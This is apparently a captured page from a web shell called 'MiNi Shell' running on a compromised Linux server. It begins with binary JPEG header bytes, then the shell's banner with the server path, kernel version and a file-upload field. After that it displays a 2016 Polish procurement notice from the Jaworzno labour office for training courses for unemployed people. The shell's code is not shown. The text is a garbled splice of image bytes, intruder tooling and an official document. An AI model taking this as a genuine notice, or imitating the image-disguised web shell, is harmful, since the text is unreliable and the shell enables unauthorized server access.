JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160216/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160216/34340-N-2016.html

<p class="kh_header"><b>Jaworzno: Przedmiotem zamówienia jest usługa szkoleniowa w zakresie zorganizowania i przeprowadzenia grupowych szkoleń osób bezrobotnych w ramach projektu Aktywizacja osób młodych pozostających bez pracy w mieście Jaworznie (I) Poddziałania 1.1.1. Programu Operacyjnego Wiedza Edukacja Rozwój 2014-2020 współfinansowanego ze środków Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 34340 - 2016; data zamieszczenia: 16.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Jaworznie , ul. Północna 9B, 43-600 Jaworzno, woj. śląskie, tel. 032 6181924, faks 032 6181901.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup-jaworzno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest usługa szkoleniowa w zakresie zorganizowania i przeprowadzenia grupowych szkoleń osób bezrobotnych w ramach projektu Aktywizacja osób młodych pozostających bez pracy w mieście Jaworznie (I) Poddziałania 1.1.1. Programu Operacyjnego Wiedza Edukacja Rozwój 2014-2020 współfinansowanego ze środków Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa szkoleniowa w zakresie zorganizowania i przeprowadzenia grupowych szkoleń osób bezrobotnych w ramach projektu Aktywizacja osób młodych pozostających bez pracy w mieście Jaworznie (I) Poddziałania 1.1.1. Programu Operacyjnego Wiedza Edukacja Rozwój 2014-2020 współfinansowanego ze środków Europejskiego Funduszu Społecznego w następujących zakresach:
zakres I:  Magazynier z obsługą wózka jezdniowego i egzaminem UDT - 10 osób w I edycji,
zakres II: Sprzedawca - 10 osób w I edycji,
zakres III:  Kurs spawania blach i rur  spoinami  pachwinowymi - proces spawania 135 oraz proces spawania 141 - 5 osób w I edycji,
zakres IV: Operator - kierowca wózka jezdniowego wraz z wymianą butli gazowych oraz egzaminem UDT -15 w dwóch edycjach, (7-8 osób w jednej edycji),
zakres V:  Pracownik administracyjno- biurowy z elementami kadr i płac - 5 osób w I edycji,
zakres VI: Uprawnienia SEP do 1 kV - 5 osób w I edycji,
zakres VII: Sekretarka - 5 osób w I edycji,
zakres VIII: Kelner-barman- 5 osób w I edycji,
zakres IX: Technolog robót wykończeniowych - 5 osób w I edycji..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku wymagane jest by Wykonawca wykazał, że posiada aktualny wpis do rejestru instytucji szkoleniowych prowadzony przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę Wykonawcy - zgodnie z rozporządzeniem Ministra Gospodarki
 i Pracy z dnia 27 października 2004r. w sprawie rejestru instytucji szkoleniowych /tekst jednolity: Dz. U. z 2014r, poz. 781/
Ocena spełnienia warunku nastąpi na podstawie przedstawionego przez Wykonawcę oświadczenia, o którym mowa w rozdziale 6 ust.3 pkt 3.1 i pkt 3.2 SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku wymagane jest by Wykonawca wykazał,
że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - wykonał co najmniej dwie usługi odpowiadające swoim rodzajem przedmiotowi zamówienia:
1) . zakres I - co najmniej dwie usługi szkoleniowe z zakresu Magazynier z obsługą wózka jezdniowego i egzaminem UDT na minimum 10 osób. Zamawiający uzna również warunek za spełniony w przypadku oddzielnej realizacji tych szkoleń, czyli oddzielnie po dwa szkolenia: Magazynier oraz Operator-kierowca wózka jezdniowego wraz z wymianą butli gazowych oraz egzaminem UDT. Zamawiający uzna również inną kombinację pod warunkiem, że suma szkoleń ujętych w wykazie głównych usług potwierdzi zrealizowanie co najmniej dwóch usług z zakresu Magazynier z obsługą wózka jezdniowego i egzaminem UDT. Zamawiający uzna również warunek za spełniony w przypadku realizacji szkoleń o innej nazwie, o zakresie odpowiadającym przedmiotowi zamówienia. Jeżeli z nazwy szkolenia nie wynika bezpośrednio, iż odpowiada swoim rodzajem przedmiotowi zamówienia należy wskazać jakie moduły zawiera.
2)zakres II - co najmniej dwie usługi szkoleniowe z zakresu Sprzedawca na minimum 10 osób. Zamawiający uzna również warunek za spełniony w przypadku realizacji szkoleń o innej nazwie, o zakresie odpowiadającym przedmiotowi zamówienia. Jeżeli z nazwy szkolenia nie wynika bezpośrednio, iż odpowiada swoim rodzajem przedmiotowi zamówienia należy wskazać jakie moduły zawiera.

3) zakres III wykonał co najmniej dwie usługi z zakresu Kurs spawania blach i rur spoinami pachwinowymi - proces spawania 135 oraz proces spawania 141 na minimum 5 osób. Zamawiający uzna  warunek za spełniony w przypadku oddzielnej realizacji tych szkoleń, czyli oddzielnie po dwa szkolenia: Kurs spawania blach i rur  spoinami  pachwinowymi - proces spawania 135 oraz  Kurs spawania blach i rur spoinami  pachwinowymi - proces spawania 141. 
Zamawiający uzna również inną kombinację pod warunkiem, że suma szkoleń ujętych w wykazie głównych usług potwierdzi zrealizowanie co najmniej dwóch usług z zakresu spawanie blach i rur spoinami pachwinowymi - proces spawania 135 oraz proces spawania 141.  Zamawiający uzna również warunek za spełniony w przypadku realizacji szkoleń o innej nazwie. Jeżeli z nazwy szkolenia nie wynika bezpośrednio, iż odpowiada swoim rodzajem przedmiotowi zamówienia należy wskazać jakie moduły zawiera.
4) zakres IV  wykonał co najmniej dwie usługi z zakresu Operator - kierowca wózka jezdniowego wraz z wymianą butli gazowych oraz egzaminem UDT na minimum 8 osób. Zamawiający uzna również warunek za spełniony w przypadku realizacji szkoleń o innej nazwie, o zakresie odpowiadającym przedmiotowi zamówienia. Jeżeli z nazwy szkolenia nie wynika bezpośrednio, iż odpowiada swoim rodzajem przedmiotowi zamówienia należy wskazać jakie moduły zawiera.
5) zakres V  wykonał co najmniej dwie usługi szkoleniowe z zakresu Pracownik administracyjno - biurowy z elementami kadr i płac na minimum 5 osób. Zamawiający uzna  warunek za spełniony w przypadku oddzielnej realizacji tych szkoleń, czyli oddzielnie po dwa szkolenia: pracownik administracyjno - biurowy oraz szkolenia z zakresu kadr i płac. Zamawiający uzna również inną kombinację pod warunkiem, że suma szkoleń ujętych w wykazie głównych usług potwierdzi zrealizowanie co najmniej dwóch usług z zakresu pracownik administracyjno - biurowy z elementami kadr i płac Zamawiający uzna również warunek za spełniony w przypadku realizacji szkoleń o innej nazwie. Jeżeli z nazwy szkolenia nie wynika bezpośrednio, iż odpowiada swoim rodzajem przedmiotowi zamówienia należy wskazać jakie moduły zawiera.
6) zakres VI wykonał co najmniej dwie usługi szkoleniowe z zakresu Uprawnienia SEP do 1 kV na minimum 5 osób Zamawiający uzna również warunek za spełniony
w przypadku realizacji szkoleń o innej nazwie. Jeżeli z nazwy szkolenia nie wynika bezpośrednio, iż odpowiada swoim rodzajem przedmiotowi zamówienia należy wskazać jakie moduły zawiera.
7) zakres VII  wykonał co najmniej dwie usługi szkoleniowe z zakresu Sekretarka  na minimum 5 osób. Zamawiający uzna również warunek za spełniony w przypadku realizacji szkoleń o innej nazwie, o zakresie odpowiadającym przedmiotowi zamówienia. Jeżeli z nazwy szkolenia nie wynika bezpośrednio, iż odpowiada swoim rodzajem przedmiotowi zamówienia należy wskazać jakie moduły zawiera.
8)zakres VIII  wykonał co najmniej dwie usługi szkoleniowe z zakresu Kelner - Barman na minimum 5 osób. Zamawiający uzna również warunek za spełniony w przypadku oddzielnej realizacji tych szkoleń, czyli oddzielnie po dwa szkolenia: Kelner oraz Barman. Zamawiający uzna również inną kombinację pod warunkiem, że suma szkoleń ujętych w wykazie głównych usług potwierdzi zrealizowanie co najmniej dwóch usług z zakresu Kelner- Barman. Zamawiający uzna również warunek za spełniony w przypadku realizacji szkoleń o innej nazwie, o zakresie odpowiadającym przedmiotowi zamówienia. Jeżeli z nazwy szkolenia nie wynika bezpośrednio, iż odpowiada swoim rodzajem przedmiotowi zamówienia należy wskazać jakie moduły zawiera.
9) zakres IX  wykonał co najmniej dwie usługi z zakresu Technolog robót wykończeniowych na minimum 5 osób. Zamawiający uzna również warunek za spełniony w przypadku realizacji szkoleń o innej nazwie, o zakresie odpowiadającym przedmiotowi zamówienia. Jeżeli z nazwy szkolenia nie wynika bezpośrednio, iż odpowiada swoim rodzajem przedmiotowi zamówienia należy wskazać jakie moduły zawiera.      
1.2.2.	Ocena spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń, o których mowa w rozdziale 6 ust.4 pkt 4.1-4.3 SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie dysponowania osobami zdolnymi do wykonania zamówienia, Wykonawca wyznaczy
do realizacji przedmiotu zamówienia kadrę wykładowczą, spełniającą następujące warunki:
1)  wykładowcy prowadzący zajęcia teoretyczne muszą posiadać wykształcenie wyższe związane z tematyką prowadzonej jednostki modułowej lub wykształcenie wyższe oraz minimum 3 letnie doświadczenie zawodowe w prowadzeniu zajęć dydaktycznych zgodnych z tematyką prowadzonej jednostki modułowej.
W przypadku jednostki modułowej: obsługa wózków jezdniowych wraz z wyminą butli gazowych oraz obsługa kasy fiskalnej i terminali płatniczych Zamawiający dopuszcza możliwość prowadzenia szkolenia przez wykładowców posiadających wykształcenie minimum średnie oraz minimum 3 letnie doświadczenie zawodowe w prowadzeniu zajęć dydaktycznych zgodnych z tematyką prowadzonej jednostki modułowej.
2) wykładowcy prowadzący zajęcia praktyczne oraz ćwiczenia muszą posiadać co najmniej	wykształcenie średnie związane z tematyką prowadzonej jednostki modułowej lub	wykształcenie średnie oraz minimum 3 letnie doświadczenie zawodowe w prowadzeniu zajęć 	dydaktycznych zgodnych z tematyką prowadzonej jednostki modułowej.
3) każda z osób prowadzących zajęcia musi posiadać co najmniej 2 letnie doświadczenie 	zawodowe w prowadzeniu zajęć  dydaktycznych zgodnych z tematyką prowadzonej jednostki 	modułowej;
1.3.2	Ocena spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń, o których mowa w rozdziale 6  ust.5  pkt 5.1-5.2 SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenia o wpisie do rejestru instytucji szkoleniowych prowadzonego przez właściwy 	wojewódzki urząd pracy. (zał. nr 10 do SIWZ)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.85</li>
<li>2 - posiadanie certyfikatu jakości usług - 0.1</li>
<li>3 - prowadzenie analiz skuteczności i efektywności przeprowadzanych szkoleń - 0.05</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2. Zamawiający przewiduje możliwość zmiany umowy, po wzajemnym uzgodnieniu stron, w zakresie:
1) osób prowadzących szkolenie. Po uzyskaniu pisemnej zgody Zamawiającego, w szczególnie 	uzasadnionych przypadkach (np. choroba, zgon lub inna sytuacja losowa, której nie można było 	wcześniej przewidzieć) Wykonawca może dokonać wymiany osób delegowanych do wykonania 	przedmiotu umowy. W takiej sytuacji Wykonawca przedstawi Zamawiającemu 
     pisemnie propozycję  zmiany  wraz  z  jej  uzasadnieniem,    wskazując  osobę/y o  co  najmniej
	porównywalnych kwalifikacjach jakie określono w SIWZ. Jednocześnie Wykonawcy nie	przysługuje roszczenie o zwrot kosztów wynikających bezpośrednio lub pośrednio z wymiany	osób, wyznaczonych przez Wykonawcę do wykonania przedmiotu zamówienia.
2) terminu realizacji przedmiotu zamówienia. Po uzyskaniu pisemnej zgody Zamawiającego
	w szczególnie uzasadnionych przypadkach (np. choroba, zgon lub inna sytuacja losowa, której	nie można było wcześniej przewidzieć) Zamawiający może wyrazić zgodę na zmianę terminu	realizacji szkolenia. W takiej sytuacji Wykonawca przedstawi Zamawiającemu pisemnie	propozycję zmiany wraz z jej uzasadnieniem. Zmiana terminu szkolenia  - w szczególnie	uzasadnionych przypadkach, np. niezakwalifikowanie się odpowiedniej liczby	uczestników szkolenia - może także nastąpić z inicjatywy Zamawiającego.	Jednocześnie Wykonawcy nie  przysługuje roszczenie o zwrot kosztów wynikających	bezpośrednio lub pośrednio ze zmiany terminu realizacji przedmiotu zamówienia.
3) miejsca przeprowadzenia szkolenia. Po uzyskaniu pisemnej zgody Zamawiającego,                           	w szczególnie uzasadnionych przypadkach, Wykonawca może dokonać zmiany miejsca	przeprowadzenia szkolenia. W takiej sytuacji Wykonawca przedstawi Zamawiającemu	pisemnie propozycję zmiany wraz z jej uzasadnieniem, wskazując propozycję miejsca 	szkolenia o co najmniej porównywalnych warunkach jakie określono w SIWZ, przy	jednoczesnym spełnieniu warunku, o którym mowa w Rozdziale 3, pkt. 3, ppkt. 3.1 SIWZ. 	Jednocześnie Wykonawcy nie przysługuje roszczenie o zwrot kosztów wynikających 	bezpośrednio lub pośrednio ze zmiany miejsca szkolenia.
4) zmniejszenia ilości osób przewidzianych do przeszkolenia - w szczególnie uzasadnionych przypadkach tj. rezygnacja osoby zakwalifikowanej na szkolenie w terminie uniemożliwiającym dokonanie  kolejnego  naboru, brak  osób  spełniających  warunki  skierowania  na szkolenie, Zamawiający może zmniejszyć ilość skierowanych na szkolenie maksymalnie o 1 osobę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup-jaworzno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Jaworznie ul. Północna 9b, 43-600 Jaworzno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.02.2016 godzina 08:00, miejsce: Ofertę należy złożyć w siedzibie Powiatowego Urzędu Pracy w Jaworznie przy ulicy Północnej 9b, I  piętro, pokój nr 124,.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> w ramach projektu Aktywizacja osób młodych pozostających bez pracy 
w mieście Jaworznie (II) Poddziałanie 1.1.1. Programu Operacyjnego Wiedza Edukacja Rozwój 2014-2020 współfinansowanego ze środków Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> I. Zakres Magazynier z obsługą wózka jezdniowego i egzaminem UDT - 10 osób w I edycji..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas realizacji: nie dłużej niż 6 tygodni. 
Program szkolenia: minimalna ilość godzin - 190, w tym minimum  90 godzin ćwiczeń.
Program szkolenia musi zawierać:
1. modułowy program szkolenia zawodowego dla zawodu: magazynier, z zakresu: praca w handlu                       hurtowym (kod zawodu: 413103) z następującymi jednostkami modułowymi: 
